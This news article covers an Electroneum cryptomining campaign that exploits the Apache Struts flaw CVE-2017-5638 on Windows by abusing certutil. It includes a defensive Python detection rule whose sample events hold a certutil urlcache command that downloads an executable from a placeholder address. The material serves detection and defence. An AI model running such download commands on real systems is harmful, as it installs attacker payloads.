Electroneum-mining operation now targeting Struts systems on Windows

News by Jay Jay

The well-known cryptocurrency campaign exploiting the Apache Struts 2 Jakarta Multipart Parser remote code execution flaw is now being used by cyber-criminals to mine Electroneum coin by targeting systems running Windows operating systems.

The well-known cryptocurrency mining campaign that exploits the Apache Struts 2 Jakarta Multipart Parser remote code execution vulnerability, known among security researchers as CVE-2017-5638, is now being used by cyber-criminals to mine Electroneum coin by targeting systems running Windows operating systems.

According to security researchers at F5 Labs, the reason why cyber-criminals chose to mine Electroneum instead of popular cryptocurrencies like Monero or Bitcoin is that both Electroneum and Monero use the CryptoNight algorithm, which can be mined on both CPUs and GPUs. The researchers fear that by using this exploit, cyber-criminals could mine several other cryptocurrencies in the future.

While the campaign, which was first observed in July last year, initially targeted Struts systems running on the Linux operating system to mine Electroneum, cyber-criminals behind the operation slowly started shifting their attention to Struts systems running on Windows earlier this year. 

They achieved this by exploiting a command-line tool named “certutil”, which is normally used by developers to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs, and certificate chains.

However, cyber-criminals behind the Electroneum mining campaign exploited a particular feature in Certutil that allows anyone to fetch certificate files from remote hosts using the “urlcache” flag. By leveraging this feature, they downloaded a Windows installer file that had been created with the legitimate NSIS (Nullsoft Scriptable Install System) tool.

According to F5, "the installer script language is compatible with all major versions of Windows and provides an easy API to interact with different components of the operating system using simple syntax." Once executed, the installer initially checks the host system for the presence of ESET antivirus, and if it finds the software, it immediately stops the installation process.

If the host system doesn't contain the ESET antivirus software, the installer starts downloading and extracting several files within the system, including mssearch.exe which is, in fact, a cryptocurrency miner configured to mine Electroneum. The researchers noted that cyber-criminals have so far managed to mine around US$ 20 (£14) by using this exploit.

They added that in order to protect their systems from this mining operation, enterprises must patch the Apache Struts 2 Jakarta Multipart Parser remote code execution CVE-2017-5638 and implement web application firewalls to block such attacks.
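The certutil “urlcache” download described above also leaves a trace in process-creation logs that defenders can alert on. The following is an added example, not code from F5 Labs or from the original article: it assumes events have already been parsed into dictionaries (the field names, the Java parent process names and all sample events are constructed for illustration).

```python
import re
from ntpath import basename  # parses Windows paths on any OS

# Assumption: process names a Struts application's JVM commonly runs under.
JAVA_PARENTS = {"java.exe", "javaw.exe", "tomcat9.exe"}
# certutil accepts "-" or "/" as option prefix and ignores case.
URLCACHE = re.compile(r"(?:^|\s)[-/]urlcache\b", re.I)
REMOTE_URL = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.I)

def classify(event):
    """Return an alert dict for a certutil remote fetch, else None."""
    image = basename(event["image"]).lower()
    parent = basename(event["parent_image"]).lower()
    cmd = event["command_line"]
    if image != "certutil.exe" or not URLCACHE.search(cmd):
        return None
    url = REMOTE_URL.search(cmd)
    if url is None:
        return None  # local cache maintenance, nothing fetched from a remote host
    # A web server's JVM starting certutil to download a file is the
    # pattern reported for this campaign, so it ranks highest.
    severity = "high" if parent in JAVA_PARENTS else "medium"
    return {"host": event["host"], "severity": severity,
            "url": url.group(0), "parent": parent}

# Constructed sample events (hosts, paths and URLs are made up).
SAMPLE_EVENTS = [
    {"host": "web01", "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Program Files\Java\jre\bin\java.exe",
     "command_line": r"certutil.exe -urlcache -split -f "
                     r"http://203.0.113.10/setup.exe C:\Windows\Temp\setup.exe"},
    {"host": "ws07", "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "CertUtil /URLCache /f https://files.example.test/ca.crt ca.crt"},
    {"host": "ca01", "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "certutil -urlcache *"},
    {"host": "web01", "image": r"C:\Windows\System32\certutil.exe",
     "parent_image": r"C:\Program Files\Java\jre\bin\java.exe",
     "command_line": "certutil -verify server.cer"},
]

def run(events=SAMPLE_EVENTS):
    return [alert for alert in map(classify, events) if alert]

if __name__ == "__main__":
    for alert in run():
        print(alert)
```

Matching on the image name alone misses a copied or renamed certutil binary, so the rule works best alongside the application white-listing recommended later in the article.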

Wicus Ross, a security researcher at SecureData, told SC Magazine UK that CVE-2017-5638 is a well-documented and well-understood exploit and that cyber-criminals are frequently using it to target unpatched software.

"CVE-2017-5638 is how Equifax got burned. The exploit targets a Java based web application. Java runs on Linux, Windows, and many other operating systems. This makes writing cross platform remote code execution trivial," he noted.

He added that while web application firewalls could detect malicious actors trying well documented exploits, enterprises must also add many layers of defence and detection and also patch outdated software at the earliest.

"The shift to Windows based operating systems, while worrying, is an obvious evolution in my opinion, and this is possibly the tip of the iceberg; a poorly configured Web Server could easily act as a springboard to the internal infrastructure," warns Ed Williams, director EMEA, SpiderLabs at Trustwave.

"We know that Windows credential management is an issue for enterprise organisations, we know that generally speaking infrastructures do not do a good job of segmentation / segregation and that these two issues together allow trivial lateral movement, where more hosts can be easily compromised.  I am surprised this attack didn't go one-step further and attempt greater situational awareness and lateral movement to compromise hosts that could be further used for cryptomining.

"Web server security is extremely important, these are very interesting targets due to their nature, i.e. just sitting on the Internet, as such, extra care should be taken when securing them.  We would always recommend hardening of Web Servers and aggressive patching (they're external facing), white-listing of all applications that run on the web server is key and something we don't see enough of as an industry, only allow trusted applications that are required, anything and everything else should not be allowed to run," he adds. 

While Williams agrees that hackers would use this exploit more in the future, he says that the exploit will also evolve in complexity in the future to include other cryptocurrencies and could be stealthier than current versions. 

Joseph Carson, Chief Security Scientist at Thycotic, said: "I doubt hackers will continue to use this particular exploit as over time it will decrease and systems will become patched reducing the effectiveness of this exploit thus the reason why hackers already ported it to Windows to give it some extra life.

"Hackers will likely continue to reuse the method and technique to deploy the payload and most likely replace the exploit with another to keep the momentum and continue to mine Electroneum or other cryptocurrencies in the future."